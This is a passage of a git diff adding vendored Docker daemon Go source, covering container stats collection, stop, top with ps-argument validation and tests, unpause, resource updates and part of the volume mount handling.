"github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/api/types/versions/v1p20" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/ioutils" +) + +// ContainerStats writes information about the container to the stream +// given in the config object. +func (daemon *Daemon) ContainerStats(ctx context.Context, prefixOrName string, config *backend.ContainerStatsConfig) error { + if runtime.GOOS == "solaris" { + return fmt.Errorf("%+v does not support stats", runtime.GOOS) + } + // Engine API version (used for backwards compatibility) + apiVersion := config.Version + + container, err := daemon.GetContainer(prefixOrName) + if err != nil { + return err + } + + // If the container is either not running or restarting and requires no stream, return an empty stats. + if (!container.IsRunning() || container.IsRestarting()) && !config.Stream { + return json.NewEncoder(config.OutStream).Encode(&types.Stats{}) + } + + outStream := config.OutStream + if config.Stream { + wf := ioutils.NewWriteFlusher(outStream) + defer wf.Close() + wf.Flush() + outStream = wf + } + + var preCPUStats types.CPUStats + var preRead time.Time + getStatJSON := func(v interface{}) *types.StatsJSON { + ss := v.(types.StatsJSON) + ss.Name = container.Name + ss.ID = container.ID + ss.PreCPUStats = preCPUStats + ss.PreRead = preRead + preCPUStats = ss.CPUStats + preRead = ss.Read + return &ss + } + + enc := json.NewEncoder(outStream) + + updates := daemon.subscribeToContainerStats(container) + defer daemon.unsubscribeToContainerStats(container, updates) + + noStreamFirstFrame := true + for { + select { + case v, ok := <-updates: + if !ok { + return nil + } + + var statsJSON interface{} + statsJSONPost120 := getStatJSON(v) + if versions.LessThan(apiVersion, "1.21") { + if runtime.GOOS == "windows" { + return errors.New("API versions pre v1.21 do not support stats on Windows") + } + var ( + rxBytes uint64 + rxPackets uint64 + 
rxErrors uint64 + rxDropped uint64 + txBytes uint64 + txPackets uint64 + txErrors uint64 + txDropped uint64 + ) + for _, v := range statsJSONPost120.Networks { + rxBytes += v.RxBytes + rxPackets += v.RxPackets + rxErrors += v.RxErrors + rxDropped += v.RxDropped + txBytes += v.TxBytes + txPackets += v.TxPackets + txErrors += v.TxErrors + txDropped += v.TxDropped + } + statsJSON = &v1p20.StatsJSON{ + Stats: statsJSONPost120.Stats, + Network: types.NetworkStats{ + RxBytes: rxBytes, + RxPackets: rxPackets, + RxErrors: rxErrors, + RxDropped: rxDropped, + TxBytes: txBytes, + TxPackets: txPackets, + TxErrors: txErrors, + TxDropped: txDropped, + }, + } + } else { + statsJSON = statsJSONPost120 + } + + if !config.Stream && noStreamFirstFrame { + // prime the cpu stats so they aren't 0 in the final output + noStreamFirstFrame = false + continue + } + + if err := enc.Encode(statsJSON); err != nil { + return err + } + + if !config.Stream { + return nil + } + case <-ctx.Done(): + return nil + } + } +} + +func (daemon *Daemon) subscribeToContainerStats(c *container.Container) chan interface{} { + return daemon.statsCollector.collect(c) +} + +func (daemon *Daemon) unsubscribeToContainerStats(c *container.Container, ch chan interface{}) { + daemon.statsCollector.unsubscribe(c, ch) +} + +// GetContainerStats collects all the stats published by a container +func (daemon *Daemon) GetContainerStats(container *container.Container) (*types.StatsJSON, error) { + stats, err := daemon.stats(container) + if err != nil { + return nil, err + } + + // We already have the network stats on Windows directly from HCS. 
+ if !container.Config.NetworkDisabled && runtime.GOOS != "windows" { + if stats.Networks, err = daemon.getNetworkStats(container); err != nil { + return nil, err + } + } + + return stats, nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector.go b/vendor/github.com/docker/docker/daemon/stats_collector.go new file mode 100644 index 0000000000..dc6825e705 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_collector.go @@ -0,0 +1,132 @@ +// +build !solaris + +package daemon + +import ( + "bufio" + "sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/pubsub" +) + +type statsSupervisor interface { + // GetContainerStats collects all the stats related to a container + GetContainerStats(container *container.Container) (*types.StatsJSON, error) +} + +// newStatsCollector returns a new statsCollector that collections +// stats for a registered container at the specified interval. +// The collector allows non-running containers to be added +// and will start processing stats when they are started. +func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector { + s := &statsCollector{ + interval: interval, + supervisor: daemon, + publishers: make(map[*container.Container]*pubsub.Publisher), + bufReader: bufio.NewReaderSize(nil, 128), + } + platformNewStatsCollector(s) + go s.run() + return s +} + +// statsCollector manages and provides container resource stats +type statsCollector struct { + m sync.Mutex + supervisor statsSupervisor + interval time.Duration + publishers map[*container.Container]*pubsub.Publisher + bufReader *bufio.Reader + + // The following fields are not set on Windows currently. 
+ clockTicksPerSecond uint64 + machineMemory uint64 +} + +// collect registers the container with the collector and adds it to +// the event loop for collection on the specified interval returning +// a channel for the subscriber to receive on. +func (s *statsCollector) collect(c *container.Container) chan interface{} { + s.m.Lock() + defer s.m.Unlock() + publisher, exists := s.publishers[c] + if !exists { + publisher = pubsub.NewPublisher(100*time.Millisecond, 1024) + s.publishers[c] = publisher + } + return publisher.Subscribe() +} + +// stopCollection closes the channels for all subscribers and removes +// the container from metrics collection. +func (s *statsCollector) stopCollection(c *container.Container) { + s.m.Lock() + if publisher, exists := s.publishers[c]; exists { + publisher.Close() + delete(s.publishers, c) + } + s.m.Unlock() +} + +// unsubscribe removes a specific subscriber from receiving updates for a container's stats. +func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) { + s.m.Lock() + publisher := s.publishers[c] + if publisher != nil { + publisher.Evict(ch) + if publisher.Len() == 0 { + delete(s.publishers, c) + } + } + s.m.Unlock() +} + +func (s *statsCollector) run() { + type publishersPair struct { + container *container.Container + publisher *pubsub.Publisher + } + // we cannot determine the capacity here. 
+ // it will grow enough in first iteration + var pairs []publishersPair + + for range time.Tick(s.interval) { + // it does not make sense in the first iteration, + // but saves allocations in further iterations + pairs = pairs[:0] + + s.m.Lock() + for container, publisher := range s.publishers { + // copy pointers here to release the lock ASAP + pairs = append(pairs, publishersPair{container, publisher}) + } + s.m.Unlock() + if len(pairs) == 0 { + continue + } + + systemUsage, err := s.getSystemCPUUsage() + if err != nil { + logrus.Errorf("collecting system cpu usage: %v", err) + continue + } + + for _, pair := range pairs { + stats, err := s.supervisor.GetContainerStats(pair.container) + if err != nil { + if _, ok := err.(errNotRunning); !ok { + logrus.Errorf("collecting stats for %s: %v", pair.container.ID, err) + } + continue + } + // FIXME: move to containerd on Linux (not Windows) + stats.CPUStats.SystemUsage = systemUsage + + pair.publisher.Publish(*stats) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go b/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go new file mode 100644 index 0000000000..9cf9f0a94e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go @@ -0,0 +1,34 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "time" +) + +// newStatsCollector returns a new statsCollector for collection stats +// for a registered container at the specified interval. The collector allows +// non-running containers to be added and will start processing stats when +// they are started. 
+func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector { + return &statsCollector{} +} + +// statsCollector manages and provides container resource stats +type statsCollector struct { +} + +// collect registers the container with the collector and adds it to +// the event loop for collection on the specified interval returning +// a channel for the subscriber to receive on. +func (s *statsCollector) collect(c *container.Container) chan interface{} { + return nil +} + +// stopCollection closes the channels for all subscribers and removes +// the container from metrics collection. +func (s *statsCollector) stopCollection(c *container.Container) { +} + +// unsubscribe removes a specific subscriber from receiving updates for a container's stats. +func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) { +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_unix.go b/vendor/github.com/docker/docker/daemon/stats_collector_unix.go new file mode 100644 index 0000000000..0fcc9c5828 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_collector_unix.go @@ -0,0 +1,71 @@ +// +build !windows,!solaris + +package daemon + +import ( + "fmt" + "os" + "strconv" + "strings" + + sysinfo "github.com/docker/docker/pkg/system" + "github.com/opencontainers/runc/libcontainer/system" +) + +// platformNewStatsCollector performs platform specific initialisation of the +// statsCollector structure. +func platformNewStatsCollector(s *statsCollector) { + s.clockTicksPerSecond = uint64(system.GetClockTicks()) + meminfo, err := sysinfo.ReadMemInfo() + if err == nil && meminfo.MemTotal > 0 { + s.machineMemory = uint64(meminfo.MemTotal) + } +} + +const nanoSecondsPerSecond = 1e9 + +// getSystemCPUUsage returns the host system's cpu usage in +// nanoseconds. An error is returned if the format of the underlying +// file does not match. +// +// Uses /proc/stat defined by POSIX. 
Looks for the cpu +// statistics line and then sums up the first seven fields +// provided. See `man 5 proc` for details on specific field +// information. +func (s *statsCollector) getSystemCPUUsage() (uint64, error) { + var line string + f, err := os.Open("/proc/stat") + if err != nil { + return 0, err + } + defer func() { + s.bufReader.Reset(nil) + f.Close() + }() + s.bufReader.Reset(f) + err = nil + for err == nil { + line, err = s.bufReader.ReadString('\n') + if err != nil { + break + } + parts := strings.Fields(line) + switch parts[0] { + case "cpu": + if len(parts) < 8 { + return 0, fmt.Errorf("invalid number of cpu fields") + } + var totalClockTicks uint64 + for _, i := range parts[1:8] { + v, err := strconv.ParseUint(i, 10, 64) + if err != nil { + return 0, fmt.Errorf("Unable to convert value %s to int: %s", i, err) + } + totalClockTicks += v + } + return (totalClockTicks * nanoSecondsPerSecond) / + s.clockTicksPerSecond, nil + } + } + return 0, fmt.Errorf("invalid stat format. Error trying to parse the '/proc/stat' file") +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_windows.go b/vendor/github.com/docker/docker/daemon/stats_collector_windows.go new file mode 100644 index 0000000000..41731b9c14 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_collector_windows.go @@ -0,0 +1,15 @@ +// +build windows + +package daemon + +// platformNewStatsCollector performs platform specific initialisation of the +// statsCollector structure. This is a no-op on Windows. +func platformNewStatsCollector(s *statsCollector) { +} + +// getSystemCPUUsage returns the host system's cpu usage in +// nanoseconds. An error is returned if the format of the underlying +// file does not match. This is a no-op on Windows. 
+func (s *statsCollector) getSystemCPUUsage() (uint64, error) { + return 0, nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats_unix.go b/vendor/github.com/docker/docker/daemon/stats_unix.go new file mode 100644 index 0000000000..d875607b3a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_unix.go @@ -0,0 +1,58 @@ +// +build !windows + +package daemon + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" +) + +// Resolve Network SandboxID in case the container reuse another container's network stack +func (daemon *Daemon) getNetworkSandboxID(c *container.Container) (string, error) { + curr := c + for curr.HostConfig.NetworkMode.IsContainer() { + containerID := curr.HostConfig.NetworkMode.ConnectedContainer() + connected, err := daemon.GetContainer(containerID) + if err != nil { + return "", fmt.Errorf("Could not get container for %s", containerID) + } + curr = connected + } + return curr.NetworkSettings.SandboxID, nil +} + +func (daemon *Daemon) getNetworkStats(c *container.Container) (map[string]types.NetworkStats, error) { + sandboxID, err := daemon.getNetworkSandboxID(c) + if err != nil { + return nil, err + } + + sb, err := daemon.netController.SandboxByID(sandboxID) + if err != nil { + return nil, err + } + + lnstats, err := sb.Statistics() + if err != nil { + return nil, err + } + + stats := make(map[string]types.NetworkStats) + // Convert libnetwork nw stats into api stats + for ifName, ifStats := range lnstats { + stats[ifName] = types.NetworkStats{ + RxBytes: ifStats.RxBytes, + RxPackets: ifStats.RxPackets, + RxErrors: ifStats.RxErrors, + RxDropped: ifStats.RxDropped, + TxBytes: ifStats.TxBytes, + TxPackets: ifStats.TxPackets, + TxErrors: ifStats.TxErrors, + TxDropped: ifStats.TxDropped, + } + } + + return stats, nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats_windows.go b/vendor/github.com/docker/docker/daemon/stats_windows.go new file mode 100644 index 
0000000000..f8e6f6f84a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_windows.go @@ -0,0 +1,11 @@ +package daemon + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" +) + +// Windows network stats are obtained directly through HCS, hence this is a no-op. +func (daemon *Daemon) getNetworkStats(c *container.Container) (map[string]types.NetworkStats, error) { + return make(map[string]types.NetworkStats), nil +} diff --git a/vendor/github.com/docker/docker/daemon/stop.go b/vendor/github.com/docker/docker/daemon/stop.go new file mode 100644 index 0000000000..aa7b3820c8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stop.go @@ -0,0 +1,83 @@ +package daemon + +import ( + "fmt" + "net/http" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/container" +) + +// ContainerStop looks for the given container and terminates it, +// waiting the given number of seconds before forcefully killing the +// container. If a negative number of seconds is given, ContainerStop +// will wait for a graceful termination. An error is returned if the +// container is not found, is already stopped, or if there is a +// problem stopping the container. 
+func (daemon *Daemon) ContainerStop(name string, seconds *int) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + if !container.IsRunning() { + err := fmt.Errorf("Container %s is already stopped", name) + return errors.NewErrorWithStatusCode(err, http.StatusNotModified) + } + if seconds == nil { + stopTimeout := container.StopTimeout() + seconds = &stopTimeout + } + if err := daemon.containerStop(container, *seconds); err != nil { + return fmt.Errorf("Cannot stop container %s: %v", name, err) + } + return nil +} + +// containerStop halts a container by sending a stop signal, waiting for the given +// duration in seconds, and then calling SIGKILL and waiting for the +// process to exit. If a negative duration is given, Stop will wait +// for the initial signal forever. If the container is not running Stop returns +// immediately. +func (daemon *Daemon) containerStop(container *container.Container, seconds int) error { + if !container.IsRunning() { + return nil + } + + daemon.stopHealthchecks(container) + + stopSignal := container.StopSignal() + // 1. Send a stop signal + if err := daemon.killPossiblyDeadProcess(container, stopSignal); err != nil { + // While normally we might "return err" here we're not going to + // because if we can't stop the container by this point then + // its probably because its already stopped. Meaning, between + // the time of the IsRunning() call above and now it stopped. + // Also, since the err return will be environment specific we can't + // look for any particular (common) error that would indicate + // that the process is already dead vs something else going wrong. + // So, instead we'll give it up to 2 more seconds to complete and if + // by that time the container is still running, then the error + // we got is probably valid and so we force kill it. 
+ if _, err := container.WaitStop(2 * time.Second); err != nil { + logrus.Infof("Container failed to stop after sending signal %d to the process, force killing", stopSignal) + if err := daemon.killPossiblyDeadProcess(container, 9); err != nil { + return err + } + } + } + + // 2. Wait for the process to exit on its own + if _, err := container.WaitStop(time.Duration(seconds) * time.Second); err != nil { + logrus.Infof("Container %v failed to exit within %d seconds of signal %d - using the force", container.ID, seconds, stopSignal) + // 3. If it doesn't, then send SIGKILL + if err := daemon.Kill(container); err != nil { + container.WaitStop(-1 * time.Second) + logrus.Warn(err) // Don't return error because we only care that container is stopped, not what function stopped it + } + } + + daemon.LogContainerEvent(container, "stop") + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/top_unix.go b/vendor/github.com/docker/docker/daemon/top_unix.go new file mode 100644 index 0000000000..7fb81d0148 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/top_unix.go @@ -0,0 +1,126 @@ +//+build !windows + +package daemon + +import ( + "fmt" + "os/exec" + "regexp" + "strconv" + "strings" + + "github.com/docker/docker/api/types" +) + +func validatePSArgs(psArgs string) error { + // NOTE: \\s does not detect unicode whitespaces. + // So we use fieldsASCII instead of strings.Fields in parsePSOutput. 
+ // See https://github.com/docker/docker/pull/24358 + re := regexp.MustCompile("\\s+([^\\s]*)=\\s*(PID[^\\s]*)") + for _, group := range re.FindAllStringSubmatch(psArgs, -1) { + if len(group) >= 3 { + k := group[1] + v := group[2] + if k != "pid" { + return fmt.Errorf("specifying \"%s=%s\" is not allowed", k, v) + } + } + } + return nil +} + +// fieldsASCII is similar to strings.Fields but only allows ASCII whitespaces +func fieldsASCII(s string) []string { + fn := func(r rune) bool { + switch r { + case '\t', '\n', '\f', '\r', ' ': + return true + } + return false + } + return strings.FieldsFunc(s, fn) +} + +func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, error) { + procList := &types.ContainerProcessList{} + + lines := strings.Split(string(output), "\n") + procList.Titles = fieldsASCII(lines[0]) + + pidIndex := -1 + for i, name := range procList.Titles { + if name == "PID" { + pidIndex = i + } + } + if pidIndex == -1 { + return nil, fmt.Errorf("Couldn't find PID field in ps output") + } + + // loop through the output and extract the PID from each line + for _, line := range lines[1:] { + if len(line) == 0 { + continue + } + fields := fieldsASCII(line) + p, err := strconv.Atoi(fields[pidIndex]) + if err != nil { + return nil, fmt.Errorf("Unexpected pid '%s': %s", fields[pidIndex], err) + } + + for _, pid := range pids { + if pid == p { + // Make sure number of fields equals number of header titles + // merging "overhanging" fields + process := fields[:len(procList.Titles)-1] + process = append(process, strings.Join(fields[len(procList.Titles)-1:], " ")) + procList.Processes = append(procList.Processes, process) + } + } + } + return procList, nil +} + +// ContainerTop lists the processes running inside of the given +// container by calling ps with the given args, or with the flags +// "-ef" if no args are given. 
An error is returned if the container +// is not found, or is not running, or if there are any problems +// running ps, or parsing the output. +func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) { + if psArgs == "" { + psArgs = "-ef" + } + + if err := validatePSArgs(psArgs); err != nil { + return nil, err + } + + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + if !container.IsRunning() { + return nil, errNotRunning{container.ID} + } + + if container.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + + pids, err := daemon.containerd.GetPidsForContainer(container.ID) + if err != nil { + return nil, err + } + + output, err := exec.Command("ps", strings.Split(psArgs, " ")...).Output() + if err != nil { + return nil, fmt.Errorf("Error running ps: %v", err) + } + procList, err := parsePSOutput(output, pids) + if err != nil { + return nil, err + } + daemon.LogContainerEvent(container, "top") + return procList, nil +} diff --git a/vendor/github.com/docker/docker/daemon/top_unix_test.go b/vendor/github.com/docker/docker/daemon/top_unix_test.go new file mode 100644 index 0000000000..269ab6e947 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/top_unix_test.go @@ -0,0 +1,76 @@ +//+build !windows + +package daemon + +import ( + "testing" +) + +func TestContainerTopValidatePSArgs(t *testing.T) { + tests := map[string]bool{ + "ae -o uid=PID": true, + "ae -o \"uid= PID\"": true, // ascii space (0x20) + "ae -o \"uid= PID\"": false, // unicode space (U+2003, 0xe2 0x80 0x83) + "ae o uid=PID": true, + "aeo uid=PID": true, + "ae -O uid=PID": true, + "ae -o pid=PID2 -o uid=PID": true, + "ae -o pid=PID": false, + "ae -o pid=PID -o uid=PIDX": true, // FIXME: we do not need to prohibit this + "aeo pid=PID": false, + "ae": false, + "": false, + } + for psArgs, errExpected := range tests { + err := validatePSArgs(psArgs) + t.Logf("tested %q, got err=%v", psArgs, err) + 
if errExpected && err == nil { + t.Fatalf("expected error, got %v (%q)", err, psArgs) + } + if !errExpected && err != nil { + t.Fatalf("expected nil, got %v (%q)", err, psArgs) + } + } +} + +func TestContainerTopParsePSOutput(t *testing.T) { + tests := []struct { + output []byte + pids []int + errExpected bool + }{ + {[]byte(` PID COMMAND + 42 foo + 43 bar + 100 baz +`), []int{42, 43}, false}, + {[]byte(` UID COMMAND + 42 foo + 43 bar + 100 baz +`), []int{42, 43}, true}, + // unicode space (U+2003, 0xe2 0x80 0x83) + {[]byte(` PID COMMAND + 42 foo + 43 bar + 100 baz +`), []int{42, 43}, true}, + // the first space is U+2003, the second one is ascii. + {[]byte(` PID COMMAND + 42 foo + 43 bar + 100 baz +`), []int{42, 43}, true}, + } + + for _, f := range tests { + _, err := parsePSOutput(f.output, f.pids) + t.Logf("tested %q, got err=%v", string(f.output), err) + if f.errExpected && err == nil { + t.Fatalf("expected error, got %v (%q)", err, string(f.output)) + } + if !f.errExpected && err != nil { + t.Fatalf("expected nil, got %v (%q)", err, string(f.output)) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/top_windows.go b/vendor/github.com/docker/docker/daemon/top_windows.go new file mode 100644 index 0000000000..3dd8ead468 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/top_windows.go @@ -0,0 +1,53 @@ +package daemon + +import ( + "errors" + "fmt" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/go-units" +) + +// ContainerTop handles `docker top` client requests. +// Future considerations: +// -- Windows users are far more familiar with CPU% total. +// Further, users on Windows rarely see user/kernel CPU stats split. +// The kernel returns everything in terms of 100ns. To obtain +// CPU%, we could do something like docker stats does which takes two +// samples, subtract the difference and do the maths. Unfortunately this +// would slow the stat call down and require two kernel calls. 
So instead, +// we do something similar to linux and display the CPU as combined HH:MM:SS.mmm. +// -- Perhaps we could add an argument to display "raw" stats +// -- "Memory" is an extremely overloaded term in Windows. Hence we do what +// task manager does and use the private working set as the memory counter. +// We could return more info for those who really understand how memory +// management works in Windows if we introduced a "raw" stats (above). +func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) { + // It's not at all an equivalent to linux 'ps' on Windows + if psArgs != "" { + return nil, errors.New("Windows does not support arguments to top") + } + + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + s, err := daemon.containerd.Summary(container.ID) + if err != nil { + return nil, err + } + procList := &types.ContainerProcessList{} + procList.Titles = []string{"Name", "PID", "CPU", "Private Working Set"} + + for _, j := range s { + d := time.Duration((j.KernelTime100ns + j.UserTime100ns) * 100) // Combined time in nanoseconds + procList.Processes = append(procList.Processes, []string{ + j.ImageName, + fmt.Sprint(j.ProcessId), + fmt.Sprintf("%02d:%02d:%02d.%03d", int(d.Hours()), int(d.Minutes())%60, int(d.Seconds())%60, int(d.Nanoseconds()/1000000)%1000), + units.HumanSize(float64(j.MemoryWorkingSetPrivateBytes))}) + } + return procList, nil +} diff --git a/vendor/github.com/docker/docker/daemon/unpause.go b/vendor/github.com/docker/docker/daemon/unpause.go new file mode 100644 index 0000000000..e66b3868dc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/unpause.go @@ -0,0 +1,38 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/container" +) + +// ContainerUnpause unpauses a container +func (daemon *Daemon) ContainerUnpause(name string) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if err := 
daemon.containerUnpause(container); err != nil { + return err + } + + return nil +} + +// containerUnpause resumes the container execution after the container is paused. +func (daemon *Daemon) containerUnpause(container *container.Container) error { + container.Lock() + defer container.Unlock() + + // We cannot unpause the container which is not paused + if !container.Paused { + return fmt.Errorf("Container %s is not paused", container.ID) + } + + if err := daemon.containerd.Resume(container.ID); err != nil { + return fmt.Errorf("Cannot unpause container %s: %s", container.ID, err) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/update.go b/vendor/github.com/docker/docker/daemon/update.go new file mode 100644 index 0000000000..6e26eeb96a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/update.go @@ -0,0 +1,92 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/api/types/container" +) + +// ContainerUpdate updates configuration of the container +func (daemon *Daemon) ContainerUpdate(name string, hostConfig *container.HostConfig) (container.ContainerUpdateOKBody, error) { + var warnings []string + + warnings, err := daemon.verifyContainerSettings(hostConfig, nil, true) + if err != nil { + return container.ContainerUpdateOKBody{Warnings: warnings}, err + } + + if err := daemon.update(name, hostConfig); err != nil { + return container.ContainerUpdateOKBody{Warnings: warnings}, err + } + + return container.ContainerUpdateOKBody{Warnings: warnings}, nil +} + +// ContainerUpdateCmdOnBuild updates Path and Args for the container with ID cID. 
+func (daemon *Daemon) ContainerUpdateCmdOnBuild(cID string, cmd []string) error { + if len(cmd) == 0 { + return nil + } + c, err := daemon.GetContainer(cID) + if err != nil { + return err + } + c.Path = cmd[0] + c.Args = cmd[1:] + return nil +} + +func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) error { + if hostConfig == nil { + return nil + } + + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + restoreConfig := false + backupHostConfig := *container.HostConfig + defer func() { + if restoreConfig { + container.Lock() + container.HostConfig = &backupHostConfig + container.ToDisk() + container.Unlock() + } + }() + + if container.RemovalInProgress || container.Dead { + return errCannotUpdate(container.ID, fmt.Errorf("Container is marked for removal and cannot be \"update\".")) + } + + if err := container.UpdateContainer(hostConfig); err != nil { + restoreConfig = true + return errCannotUpdate(container.ID, err) + } + + // if Restart Policy changed, we need to update container monitor + if hostConfig.RestartPolicy.Name != "" { + container.UpdateMonitor(hostConfig.RestartPolicy) + } + + // If container is not running, update hostConfig struct is enough, + // resources will be updated when the container is started again. + // If container is running (including paused), we need to update configs + // to the real world. 
+ if container.IsRunning() && !container.IsRestarting() { + if err := daemon.containerd.UpdateResources(container.ID, toContainerdResources(hostConfig.Resources)); err != nil { + restoreConfig = true + return errCannotUpdate(container.ID, err) + } + } + + daemon.LogContainerEvent(container, "update") + + return nil +} + +func errCannotUpdate(containerID string, err error) error { + return fmt.Errorf("Cannot update container %s: %v", containerID, err) +} diff --git a/vendor/github.com/docker/docker/daemon/update_linux.go b/vendor/github.com/docker/docker/daemon/update_linux.go new file mode 100644 index 0000000000..f422325272 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/update_linux.go @@ -0,0 +1,25 @@ +// +build linux + +package daemon + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/libcontainerd" +) + +func toContainerdResources(resources container.Resources) libcontainerd.Resources { + var r libcontainerd.Resources + r.BlkioWeight = uint64(resources.BlkioWeight) + r.CpuShares = uint64(resources.CPUShares) + r.CpuPeriod = uint64(resources.CPUPeriod) + r.CpuQuota = uint64(resources.CPUQuota) + r.CpusetCpus = resources.CpusetCpus + r.CpusetMems = resources.CpusetMems + r.MemoryLimit = uint64(resources.Memory) + if resources.MemorySwap > 0 { + r.MemorySwap = uint64(resources.MemorySwap) + } + r.MemoryReservation = uint64(resources.MemoryReservation) + r.KernelMemoryLimit = uint64(resources.KernelMemory) + return r +} diff --git a/vendor/github.com/docker/docker/daemon/update_solaris.go b/vendor/github.com/docker/docker/daemon/update_solaris.go new file mode 100644 index 0000000000..f3b545c5f0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/update_solaris.go @@ -0,0 +1,11 @@ +package daemon + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/libcontainerd" +) + +func toContainerdResources(resources container.Resources) libcontainerd.Resources { + var r 
libcontainerd.Resources + return r +} diff --git a/vendor/github.com/docker/docker/daemon/update_windows.go b/vendor/github.com/docker/docker/daemon/update_windows.go new file mode 100644 index 0000000000..01466260bb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/update_windows.go @@ -0,0 +1,13 @@ +// +build windows + +package daemon + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/libcontainerd" +) + +func toContainerdResources(resources container.Resources) libcontainerd.Resources { + var r libcontainerd.Resources + return r +} diff --git a/vendor/github.com/docker/docker/daemon/volumes.go b/vendor/github.com/docker/docker/daemon/volumes.go new file mode 100644 index 0000000000..10cf787709 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes.go @@ -0,0 +1,303 @@ +package daemon + +import ( + "errors" + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/Sirupsen/logrus" + dockererrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/container" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" + "github.com/opencontainers/runc/libcontainer/label" +) + +var ( + // ErrVolumeReadonly is used to signal an error when trying to copy data into + // a volume mount that is not writable. + ErrVolumeReadonly = errors.New("mounted volume is marked read-only") +) + +type mounts []container.Mount + +// volumeToAPIType converts a volume.Volume to the type used by the Engine API +func volumeToAPIType(v volume.Volume) *types.Volume { + tv := &types.Volume{ + Name: v.Name(), + Driver: v.DriverName(), + } + if v, ok := v.(volume.DetailedVolume); ok { + tv.Labels = v.Labels() + tv.Options = v.Options() + tv.Scope = v.Scope() + } + + return tv +} + +// Len returns the number of mounts. Used in sorting. 
+func (m mounts) Len() int { + return len(m) +} + +// Less returns true if the number of parts (a/b/c would be 3 parts) in the +// mount indexed by parameter 1 is less than that of the mount indexed by +// parameter 2. Used in sorting. +func (m mounts) Less(i, j int) bool { + return m.parts(i) < m.parts(j) +} + +// Swap swaps two items in an array of mounts. Used in sorting +func (m mounts) Swap(i, j int) { + m[i], m[j] = m[j], m[i] +} + +// parts returns the number of parts in the destination of a mount. Used in sorting. +func (m mounts) parts(i int) int { + return strings.Count(filepath.Clean(m[i].Destination), string(os.PathSeparator)) +} + +// registerMountPoints initializes the container mount points with the configured volumes and bind mounts. +// It follows the next sequence to decide what to mount in each final destination: +// +// 1. Select the previously configured mount points for the containers, if any. +// 2. Select the volumes mounted from another containers. Overrides previously configured mount point destination. +// 3. Select the bind mounts set by the client. Overrides previously configured mount point destinations. +// 4. Cleanup old volumes that are about to be reassigned. +func (daemon *Daemon) registerMountPoints(container *container.Container, hostConfig *containertypes.HostConfig) (retErr error) { + binds := map[string]bool{} + mountPoints := map[string]*volume.MountPoint{} + defer func() { + // clean up the container mountpoints once return with error + if retErr != nil { + for _, m := range mountPoints { + if m.Volume == nil { + continue + } + daemon.volumes.Dereference(m.Volume, container.ID) + } + } + }() + + // 1. Read already configured mount points. + for destination, point := range container.MountPoints { + mountPoints[destination] = point + } + + // 2. Read volumes from other containers. 
